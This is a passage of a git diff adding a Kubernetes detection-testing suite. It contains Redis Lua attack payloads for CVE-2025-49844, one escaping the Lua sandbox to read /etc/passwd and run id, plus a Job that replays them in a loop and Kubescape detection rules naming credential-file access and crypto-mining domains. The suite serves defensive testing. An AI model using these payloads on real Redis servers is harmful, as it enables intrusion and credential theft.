out + successIndicators: + - responseContains: "revshell:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: perl + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 12: Credential Harvesting via /etc/passwd + id (R0001) ────── + - name: credential-harvest-passwd + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen("awk -F: '$3==0{print $1}' /etc/passwd && id 2>&1") + local out = f:read('*a') + f:close() + return 'creds:' .. out + successIndicators: + - responseContains: "creds:root" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: awk diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml new file mode 100644 index 00000000000..10635ccdc02 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bobctl-attack-job.yaml @@ -0,0 +1,153 @@ +# Job that runs bobctl in a tight loop to continuously execute the +# CVE-2025-49844 attack suite against the vulnerable redis deployment. The +# bobctl binary is downloaded at container startup by an init container, so +# no image build is needed. The attack suite YAML is mounted from the +# bob-suite-attack ConfigMap at /suite/redis-attacks.yaml. +# +# bobctl reaches the redis Service via kubectl-port-forward style: +# it queries the apiserver for the Service + a backing Pod, then opens a +# pods/portforward stream to that Pod. The dedicated ServiceAccount + +# Role below grant exactly the verbs required for that flow. +# +# The Job's pod must land in the `redis` namespace (same as the Redis +# Service and Kubescape ApplicationProfile) so the attack traffic is +# recorded against this namespace's profile. 
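+# To sanity-check the grants below:
+#   kubectl auth can-i create pods --subresource=portforward \
+#     --as=system:serviceaccount:redis:bobctl -n redis
+# should print "yes" once the Role and RoleBinding are applied.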
+--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: bobctl + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +rules: + - apiGroups: [""] + resources: ["services", "pods"] + verbs: ["get", "list"] + - apiGroups: [""] + resources: ["pods/portforward"] + verbs: ["create", "get"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: bobctl-port-forward + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: bobctl-port-forward +subjects: + - kind: ServiceAccount + name: bobctl + namespace: redis +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: bobctl-attack + namespace: redis + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc +spec: + backoffLimit: 100 + ttlSecondsAfterFinished: 600 + template: + metadata: + labels: + app.kubernetes.io/name: bobctl-attack + app.kubernetes.io/part-of: sovereign-soc + spec: + restartPolicy: OnFailure + serviceAccountName: bobctl + initContainers: + - name: fetch-bobctl + image: curlimages/curl:8.15.0 + command: + - sh + - -c + - | + set -euo pipefail + curl -fsSL -o /bob/bobctl \ + https://github.com/k8sstormcenter/bob/releases/latest/download/bobctl-linux-amd64 + chmod +x /bob/bobctl + volumeMounts: + - name: bob-bin + mountPath: /bob + containers: + - name: bobctl + image: alpine:3.19 + command: + - sh + - -c + - | + set -u + # bobctl's CLI bootstrap unconditionally tries to read + # ~/.kube/config (it uses kubectl-style proxy routing for + # service targets), so synthesize a minimal in-cluster + # kubeconfig from the pod's service-account mount before + # invoking it. tokenFile is preferred over inline token so + # SA-token rotation works. + mkdir -p /root/.kube + cat > /root/.kube/config <<'EOF' + apiVersion: v1 + kind: Config + clusters: + - name: in-cluster + cluster: + certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + server: https://kubernetes.default.svc + contexts: + - name: in-cluster + context: + cluster: in-cluster + user: in-cluster + namespace: redis + current-context: in-cluster + users: + - name: in-cluster + user: + tokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token + EOF + # Small gap lets the service DNS entry propagate in very fresh namespaces. 
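+          # (If DNS is still cold on the first pass, the `|| true` in the
+          # loop below absorbs the failed run and retries 5s later.)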
+ sleep 5 + while true; do + /bob/bobctl attack \ + --attack-suite /suite/redis-attacks.yaml \ + -n redis --format json || true + sleep 5 + done + volumeMounts: + - name: bob-bin + mountPath: /bob + readOnly: true + - name: bob-suite + mountPath: /suite + readOnly: true + resources: + requests: + cpu: 100m + memory: 64Mi + limits: + cpu: 500m + memory: 256Mi + volumes: + - name: bob-bin + emptyDir: {} + - name: bob-suite + configMap: + name: bob-suite-attack diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md new file mode 100644 index 00000000000..4ee6abddd9f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/README.md @@ -0,0 +1,77 @@ +# Helm-rendered Kubescape + Vector manifests for the sovereign-soc suite + +`PrerenderedDeploy` only applies static YAML; it does not invoke helm at +runtime. So the Kubescape and Vector charts used by the Sovereign SOC demo +are pre-rendered once and committed here. The source values files that +went in are also committed so the render is reproducible. + +Sources: + +- `kubescape-values.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/values.yaml). +- `kubescape-default-rules.yaml` — copied verbatim from + [`k8sstormcenter/soc@main:tree/kubescape/default-rules.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/kubescape/default-rules.yaml). +- `vector-values.yaml` — based on + [`k8sstormcenter/soc@main:tree/vector-lab/values.yaml`](https://github.com/k8sstormcenter/soc/blob/main/tree/vector-lab/values.yaml) + with the ClickHouse sink `endpoint:` rewritten to the external forensic + endpoint (`http://clickhouse.forensic.austrianopencloudcommunity.org:8123`) + so Vector can write to CH from any experiment cluster, not just the + forensic cluster's in-cluster DNS. + +## How to re-render + +From inside the dev docker container, with its helm in `$PATH`: + +```sh +helm repo add kubescape https://kubescape.github.io/helm-charts/ +helm repo add vector https://helm.vector.dev +helm repo update + +# Kubescape operator (pinned to the version used by soc/Makefile). +helm template kubescape kubescape/kubescape-operator \ + --version 1.30.2 \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml + +# Split the kube-system-namespaced RoleBinding (storage-auth-reader) into +# its own file, because PrerenderedDeploy only tolerates a single namespace +# per step. +python3 - <<'PY' +import yaml, os +base = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered" +with open(f"{base}/kubescape.rendered.yaml") as f: + docs = list(yaml.safe_load_all(f)) +main, ks = [], [] +for d in docs: + if d is None: continue + ns = (d.get("metadata") or {}).get("namespace") + (ks if ns == "kube-system" else main).append(d) +with open(f"{base}/kubescape.rendered.yaml", "w") as f: + yaml.safe_dump_all(main, f, sort_keys=False) +with open(f"{base}/kubescape.rendered.kube-system.yaml", "w") as f: + yaml.safe_dump_all(ks, f, sort_keys=False) +PY + +# Vector (version pinned to whatever's current on the vector repo). 
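+# For a reproducible render, record and pin the chart version, e.g.:
+#   helm show chart vector/vector | grep '^version:'
+# then pass that via --version to the helm template call below.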
+helm template vector vector/vector \ + --namespace honey --create-namespace \ + --values src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml \ + > src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml +``` + +## Why the kube-system split + +The kubescape-operator chart includes a single `RoleBinding` in +`kube-system` — `storage-auth-reader` — that delegates auth checking to +the kube-apiserver's `extension-apiserver-authentication-reader` Role +(required for the storage APIService aggregation to work; without it the +`ApplicationProfile` CRD can't be read, which means node-agent can't +compare workload behavior against the pre-populated redis profile). + +`RoleBinding` objects must reside in the same namespace as the Role they +reference, so we can't rewrite it into `honey`. And +`PrerenderedDeploy.getNamespace()` errors if a single concatenated YAML +touches more than one namespace. We split it into its own step and flag +it `skip_namespace_delete: true` on the proto spec so teardown never +tries to `kubectl delete ns kube-system`. diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml new file mode 100644 index 00000000000..349c704f8a6 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-default-rules.yaml @@ -0,0 +1,746 @@ +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey +spec: + rules: + - description: Detects unexpected process launches that are not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected process launched: ' + event.comm + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: exec + expression: >- + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + id: R0001 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Unexpected process launched + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - process + - exec + - applicationprofile + - description: Detects unexpected file access that is not in the baseline + enabled: true + expressions: + message: >- + 'Unexpected file access detected: ' + event.comm + ' with PID ' + + string(event.pid) + ' to ' + event.path + ruleExpression: + - eventType: open + expression: >- + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0002 + isTriggerAlert: true + mitreTactic: TA0009 + mitreTechnique: T1005 + name: Files Access Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: true + tags: + - anomaly + - file + - open + - applicationprofile + - description: >- + Detects unexpected system calls that are not whitelisted by application + profile + enabled: false + expressions: + message: >- + 'Unexpected system call detected: ' + event.syscallName + ' with PID ' + + string(event.pid) + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + uniqueId: event.syscallName + id: R0003 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Syscalls Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - syscall + - applicationprofile + - description: >- + Detects unexpected 
capabilities that are not whitelisted by application + profile + enabled: true + expressions: + message: >- + 'Unexpected capability used: ' + event.capName + ' in syscall ' + + event.syscallName + ' with PID ' + string(event.pid) + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + uniqueId: event.comm + '_' + event.capName + id: R0004 + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Linux Capabilities Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - anomaly + - capabilities + - applicationprofile + - description: >- + Detecting unexpected domain requests that are not whitelisted by + application profile. + enabled: true + expressions: + message: >- + 'Unexpected domain communication: ' + event.name + ' from: ' + + event.containerName + ruleExpression: + - eventType: dns + expression: >- + !event.name.endsWith('.svc.cluster.local.') && + !nn.is_domain_in_egress(event.containerId, event.name) + uniqueId: event.comm + '_' + event.name + id: R0005 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: DNS Anomalies in container + profileDependency: 0 + severity: 1 + supportPolicy: false + tags: + - dns + - anomaly + - networkprofile + - description: Detecting unexpected access to service account token. + enabled: true + expressions: + message: >- + 'Unexpected access to service account token: ' + event.path + ' with + flags: ' + event.flags.join(',') + ruleExpression: + - eventType: open + expression: > + ((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount') + && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token')) || + (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount') && event.path.endsWith('/token'))) && + !ap.was_path_opened_with_suffix(event.containerId, '/token') + uniqueId: event.comm + id: R0006 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + name: Unexpected service account token access + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - serviceaccount + - applicationprofile + - description: Detecting execution of kubernetes client + enabled: true + expressions: + message: >- + eventType == 'exec' ? 'Kubernetes client (' + event.comm + ') was + executed with PID ' + string(event.pid) : 'Network connection to + Kubernetes API server from container ' + event.containerName + ruleExpression: + - eventType: exec + expression: >- + (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && + k8s.is_api_server_address(event.dstAddr) && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: >- + eventType == 'exec' ? 'exec_' + event.comm : 'network_' + + event.dstAddr + id: R0007 + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + name: Workload uses Kubernetes API unexpectedly + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - exec + - network + - anomaly + - applicationprofile + - description: Detecting reading environment variables from procfs. 
+ enabled: true + expressions: + message: >- + 'Reading environment variables from procfs: ' + event.path + ' by + process ' + event.comm + ruleExpression: + - eventType: open + expression: > + event.path.startsWith('/proc/') && + event.path.endsWith('/environ') && + !ap.was_path_opened_with_suffix(event.containerId, '/environ') + uniqueId: event.comm + '_' + event.path + id: R0008 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + name: Read Environment Variables from procfs + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - anomaly + - procfs + - environment + - applicationprofile + - description: Detecting eBPF program load. + enabled: true + expressions: + message: >- + 'bpf program load system call (bpf) was called by process (' + + event.comm + ') with command (BPF_PROG_LOAD)' + ruleExpression: + - eventType: bpf + expression: >- + event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + id: R0009 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + name: eBPF Program Load + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - bpf + - ebpf + - applicationprofile + - description: Detecting access to sensitive files. + enabled: true + expressions: + message: >- + 'Unexpected sensitive file access: ' + event.path + ' by process ' + + event.comm + ruleExpression: + - eventType: open + expression: >- + event.path.startsWith('/etc/shadow') && + !ap.was_path_opened(event.containerId, event.path) + uniqueId: event.comm + '_' + event.path + id: R0010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Unexpected Sensitive File Access + profileDependency: 1 + severity: 5 + supportPolicy: false + tags: + - files + - anomaly + - applicationprofile + - description: >- + Detecting unexpected egress network traffic that is not whitelisted by + application profile. 
+ enabled: false + expressions: + message: >- + 'Unexpected egress network communication to: ' + event.dstAddr + ':' + + string(event.dstPort) + ' using ' + event.proto + ' from: ' + + event.containerName + ruleExpression: + - eventType: network + expression: >- + event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + id: R0011 + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + name: Unexpected Egress Network Traffic + profileDependency: 0 + severity: 5 + supportPolicy: false + tags: + - whitelisted + - network + - anomaly + - networkprofile + - description: 'Detecting exec calls that are from malicious source like: /dev/shm' + enabled: true + expressions: + message: >- + 'Execution from malicious source: ' + event.exepath + ' in directory ' + + event.cwd + ruleExpression: + - eventType: exec + expression: > + (event.exepath == '/dev/shm' || + event.exepath.startsWith('/dev/shm/')) || (event.cwd == '/dev/shm' + || event.cwd.startsWith('/dev/shm/') || + (parse.get_exec_path(event.args, + event.comm).startsWith('/dev/shm/'))) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1000 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + name: Process executed from malicious source + profileDependency: 2 + severity: 8 + supportPolicy: false + tags: + - exec + - signature + - malicious + - description: Detecting exec calls of binaries that are not included in the base image + enabled: true + expressions: + message: >- + 'Process (' + event.comm + ') was executed and is not part of the + image' + ruleExpression: + - eventType: exec + expression: > + (event.upperlayer == true || + event.pupperlayer == true) && + !ap.was_executed(event.containerId, + parse.get_exec_path(event.args, event.comm)) + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + id: R1001 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + name: Drifted process executed + profileDependency: 1 + severity: 8 + supportPolicy: false + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - description: Detecting Kernel Module Load. 
+    enabled: true
+    expressions:
+      message: >-
+        'Kernel module (' + event.module + ') loading attempt with syscall (' +
+        event.syscallName + ') was called by process (' + event.comm + ')'
+      ruleExpression:
+        - eventType: kmod
+          expression: >-
+            event.syscallName == 'init_module' || event.syscallName ==
+            'finit_module'
+      uniqueId: event.comm + '_' + event.syscallName + '_' + event.module
+    id: R1002
+    isTriggerAlert: true
+    mitreTactic: TA0005
+    mitreTechnique: T1547.006
+    name: Process tries to load a kernel module
+    profileDependency: 2
+    severity: 10
+    supportPolicy: false
+    tags:
+      - kmod
+      - kernel
+      - module
+      - load
+  - description: Detecting ssh connection to disallowed port
+    enabled: false
+    expressions:
+      message: >-
+        'Malicious SSH connection attempt to ' + event.dstIp + ':' +
+        string(dyn(event.dstPort))
+      ruleExpression:
+        - eventType: ssh
+          expression: >-
+            dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 &&
+            !(dyn(event.dstPort) in [22, 2022]) &&
+            !nn.was_address_in_egress(event.containerId, event.dstIp)
+      uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort))
+    id: R1003
+    isTriggerAlert: true
+    mitreTactic: TA0008
+    mitreTechnique: T1021.001
+    name: Disallowed ssh connection
+    profileDependency: 1
+    severity: 5
+    supportPolicy: false
+    tags:
+      - ssh
+      - connection
+      - port
+      - malicious
+      - networkprofile
+  - description: Detecting exec calls from mounted paths.
+    enabled: true
+    expressions:
+      message: '''Process ('' + event.comm + '') was executed from a mounted path'''
+      ruleExpression:
+        - eventType: exec
+          expression: >-
+            !ap.was_executed(event.containerId,
+            parse.get_exec_path(event.args, event.comm)) &&
+            k8s.get_container_mount_paths(event.namespace, event.podName,
+            event.containerName).exists(mount, event.exepath.startsWith(mount)
+            || parse.get_exec_path(event.args, event.comm).startsWith(mount))
+      uniqueId: event.comm
+    id: R1004
+    isTriggerAlert: true
+    mitreTactic: TA0002
+    mitreTechnique: T1059
+    name: Process executed from mount
+    profileDependency: 1
+    severity: 5
+    supportPolicy: false
+    tags:
+      - exec
+      - mount
+      - applicationprofile
+  - description: Detecting Fileless Execution
+    enabled: true
+    expressions:
+      message: >-
+        'Fileless execution detected: exec call "' + event.comm + '" is from a
+        malicious source'
+      ruleExpression:
+        - eventType: exec
+          expression: >-
+            event.exepath.contains('memfd') ||
+            event.exepath.startsWith('/proc/self/fd') ||
+            event.exepath.matches('/proc/[0-9]+/fd/[0-9]+')
+      uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm
+    id: R1005
+    isTriggerAlert: true
+    mitreTactic: TA0005
+    mitreTechnique: T1055
+    name: Fileless execution detected
+    profileDependency: 2
+    severity: 8
+    supportPolicy: false
+    tags:
+      - fileless
+      - execution
+      - malicious
+  - description: >-
+      Detecting Unshare System Call usage, which can be used to escape the
+      container.
+    enabled: true
+    expressions:
+      message: >-
+        'Unshare system call (unshare) was called by process (' + event.comm +
+        ')'
+      ruleExpression:
+        - eventType: unshare
+          expression: >-
+            event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId,
+            'unshare')
+      uniqueId: event.comm + '_' + 'unshare'
+    id: R1006
+    isTriggerAlert: true
+    mitreTactic: TA0004
+    mitreTechnique: T1611
+    name: Process tries to escape container
+    profileDependency: 2
+    severity: 5
+    supportPolicy: false
+    tags:
+      - unshare
+      - escape
+      - anomaly
+      - applicationprofile
+  - description: Detecting XMR Crypto Miners by randomx algorithm usage.
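+    # R1007's expression is the constant 'true': any event of the dedicated
+    # randomx type raises an alert, independent of any learned profile
+    # (profileDependency: 2).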
+ enabled: true + expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + ruleExpression: + - eventType: randomx + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1007 + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + name: Crypto miner launched + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - crypto + - miners + - malicious + - description: Detecting Crypto miners communication by domain + enabled: true + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + ruleExpression: + - eventType: dns + expression: >- + event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', + 'btm.antpool.com.', 'c3pool.com.', 'c4pool.org.', + 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', + 'de.minexmr.com.', 'eth-ar.dwarfpool.com.', + 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', + 'eth-br.dwarfpool.com.', 'eth-cn.dwarfpool.com.', + 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', + 'eth-hk.dwarfpool.com.', 'eth-jp1.nanopool.org.', + 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', + 'eth-us-west1.nanopool.org.', 'eth-us.dwarfpool.com.', + 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', + 'eu.stratum.slushpool.com.', 'eu1.ethermine.org.', + 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', + 'miningmadness.com.', 'monero.cedric-crispin.com.', + 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', + 'monerohash.com.', 'moneroocean.stream.', 'monerop.com.', + 'multi-pools.com.', 'p2pool.io.', 'pool.kryptex.com.', + 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', + 'prohashing.com.', 'rx.unmineable.com.', 'sg.minexmr.com.', + 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', + 'stratum-btm.antpool.com.', 'stratum-dash.antpool.com.', + 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', + 'stratum.antpool.com.', 'supportxmr.com.', 'trustpool.cc.', + 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', + 'web.xmrpool.eu.', 'www.domajorpool.com.', 'www.dxpool.com.', + 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', + 'xmr-eu1.nanopool.org.', 'xmr-eu2.nanopool.org.', + 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', + 'xmr.crypto-pool.fr.', 'xmr.gntl.uk.', 'xmr.nanopool.org.', + 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', + 'zec.antpool.com.', 'zergpool.com.', 'auto.c3pool.org.', + 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + uniqueId: event.name + '_' + event.comm + id: R1008 + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + name: Crypto Mining Domain Communication + profileDependency: 2 + severity: 10 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - dns + - description: 
Detecting Crypto Miners by suspicious port usage. + enabled: true + expressions: + message: >- + 'Detected crypto mining related port communication on port ' + + string(event.dstPort) + ' to ' + event.dstAddr + ' with protocol ' + + event.proto + ruleExpression: + - eventType: network + expression: >- + event.proto == 'TCP' && event.pktType == 'OUTGOING' && + event.dstPort in [3333, 45700] && + !nn.was_address_in_egress(event.containerId, event.dstAddr) + uniqueId: event.comm + '_' + string(event.dstPort) + id: R1009 + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + name: Crypto Mining Related Port Communication + profileDependency: 1 + severity: 3 + supportPolicy: false + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - description: Detects symlink creation over sensitive files + enabled: true + expressions: + message: >- + 'Symlink created over sensitive file: ' + event.oldPath + ' -> ' + + event.newPath + ruleExpression: + - eventType: symlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1010 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Soft link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - anomaly + - symlink + - applicationprofile + - description: Detecting ld_preload hook techniques. + enabled: false + expressions: + message: >- + eventType == 'exec' ? 'Process (' + event.comm + ') is using a dynamic + linker hook: ' + process.get_ld_hook_var(event.pid) : 'The dynamic + linker configuration file (' + event.path + ') was modified by process + (' + event.comm + ')' + ruleExpression: + - eventType: exec + expression: >- + event.comm != 'java' && event.containerName != 'matlab' && + process.get_ld_hook_var(event.pid) != '' + - eventType: open + expression: >- + event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && + event.flagsRaw != 0 + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + id: R1011 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + name: ld_preload hooks technique detected + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - exec + - malicious + - applicationprofile + - description: Detecting hardlink creation over sensitive files. + enabled: true + expressions: + message: >- + 'Hardlink created over sensitive file: ' + event.oldPath + ' - ' + + event.newPath + ruleExpression: + - eventType: hardlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1012 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Hard link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - files + - malicious + - applicationprofile + - description: Detecting potentially malicious ptrace usage. 
+ enabled: true + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + ruleExpression: + - eventType: ptrace + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1015 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + name: Malicious Ptrace Usage + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - process + - malicious + - description: >- + Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + enabled: true + expressions: + message: >- + 'Unexpected io_uring operation detected: (opcode=' + + string(event.opcode) + ') flags=0x' + (has(event.flagsRaw) ? + string(event.flagsRaw) : '0') + ' in ' + event.comm + '.' + ruleExpression: + - eventType: iouring + expression: 'true' + uniqueId: string(event.opcode) + '_' + event.comm + id: R1030 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + name: Unexpected io_uring Operation Detected + profileDependency: 0 + severity: 5 + supportPolicy: true + tags: + - syscalls + - io_uring + - applicationprofile + - description: >- + Detects plaintext exec API calls intercepted from kubelet TLS + connections, indicating potential unauthorized command execution via the + kubelet API. + enabled: true + expressions: + message: >- + 'Kubelet TLS exec request intercepted: ' + event.tlsData + ' (len=' + + string(event.tlsDataLen) + ', type=' + string(event.tlsEventType) + + ') in ' + event.comm + '.' + ruleExpression: + - eventType: kubelet_tls + expression: 'true' + uniqueId: event.comm + '_' + string(event.tlsEventType) + id: R1031 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1609 + name: Kubelet TLS Exec Request Detected + profileDependency: 0 + severity: 8 + supportPolicy: false + tags: + - kubelet + - tls + - exec + - container_administration_command diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml new file mode 100644 index 00000000000..cb9e252b95e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml @@ -0,0 +1,38 @@ +storage: + image: + repository: ghcr.io/k8sstormcenter/storage + tag: "dev-e64d59a" + +nodeAgent: + image: + 